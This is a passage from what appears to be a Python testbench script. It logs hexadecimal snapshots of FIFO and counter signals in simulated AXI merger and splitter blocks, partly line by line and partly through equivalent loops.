logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge6.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge6.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge6.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge6.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge6.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge6.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge6.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge6.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge7.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge7.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge7.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge7.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge7.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge7.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge7.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge7.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge7.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge7.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge7.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge7.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge7.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge7.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge8.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge8.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge8.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge8.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge8.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge8.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge8.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge8.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge8.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge8.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge8.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge8.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge8.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge8.axi_wr_4_merger.d_win_fifo.int_count"))
# Snapshot the merge9 AXI read-merger counters, one "SNP <hex> <path>" line
# per signal, in the same order as the per-line version.
_rd = "tb.dut.merge9.axi_rd_4_merger"
_paths = [_rd + ".%s_rcount" % _ch for _ch in "abcd"]
for _ch in "abcd":
    _paths += [_rd + ".%s_ar_fifo.count" % _ch,
               _rd + ".%s_ar_fifo.int_count" % _ch,
               _rd + ".%s_ids_fifo.next_count" % _ch,
               _rd + ".%s_ids_fifo.count" % _ch]
for _path in _paths:
    logs.log_info("SNP %x %s" % (logs.peek(_path), _path))
# Snapshot the merge9 AXI write-merger counters, again in the original order.
_wr = "tb.dut.merge9.axi_wr_4_merger"
_paths = [_wr + ".panic_%scount" % _ch for _ch in "abcd"]
_paths += [_wr + ".%s_bcount" % _ch for _ch in "abcd"]
for _ch in "abcd":
    _paths += [_wr + ".%s_aw_fifo.count" % _ch,
               _wr + ".%s_aw_fifo.int_count" % _ch,
               _wr + ".%s_b_fifo.next_count" % _ch,
               _wr + ".%s_b_fifo.count" % _ch]
    if _ch == "b":
        # Channel b alone has an out FIFO in this merger.
        _paths += [_wr + ".b_out_fifo.next_count",
                   _wr + ".b_out_fifo.count"]
    _paths += [_wr + ".%s_win_fifo.count" % _ch,
               _wr + ".%s_win_fifo.int_count" % _ch]
for _path in _paths:
    logs.log_info("SNP %x %s" % (logs.peek(_path), _path))
# Snapshot every counter in the AXI splitter instances. Each instance emits
# the same 24 signals, so one loop replaces the per-line version; the emitted
# "SNP <hex> <path>" lines and their order are unchanged.
for _inst in ("split0", "split1", "split10", "split100",
              "split101", "split102", "split103", "split104"):
    _rd = "tb.dut.%s.axi_rd_4_splitter" % _inst
    _wr = "tb.dut.%s.axi_wr_4_splitter" % _inst
    _paths = [_rd + ".ar_fifo.next_count", _rd + ".ar_fifo.count",
              _rd + ".r_fifo.next_count", _rd + ".r_fifo.count"]
    _paths += [_wr + ".%s_bcount" % _ch for _ch in "abcd"]
    _paths += [_wr + ".aw_fifo.next_count", _wr + ".aw_fifo.count",
               _wr + ".b_fifo.next_count", _wr + ".b_fifo.count"]
    for _ch in "abcd":
        _paths += [_wr + ".back_bid_%s_fifo.count" % _ch,
                   _wr + ".back_bid_%s_fifo.int_count" % _ch]
    _paths += [_wr + ".order_fifo.next_count", _wr + ".order_fifo.count",
               _wr + ".w_fifo.next_count", _wr + ".w_fifo.count"]
    for _path in _paths:
        logs.log_info("SNP %x %s" % (logs.peek(_path), _path))
logs.log_info("SNP %x tb.dut.split105.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split105.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split105.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split105.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split105.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split105.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split105.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split105.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split105.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split105.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split105.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.back_bid_b_fifo.count"))
